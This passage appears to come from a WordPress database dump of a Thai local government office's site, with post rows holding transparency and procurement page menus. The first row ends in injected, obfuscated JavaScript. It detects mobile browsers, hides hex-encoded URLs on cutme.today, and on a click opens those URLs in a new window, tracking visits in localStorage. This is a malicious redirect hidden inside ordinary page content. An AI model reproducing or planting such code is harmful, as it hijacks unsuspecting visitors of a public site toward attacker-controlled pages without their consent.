|_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-30 12:22:24','2024-08-30 05:22:24','',871,'http://pakhaeng.ssk.in.th/?p=1079',0,'revision','',0),
(1084,1,'2024-09-01 20:44:41','2024-09-01 13:44:41','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem 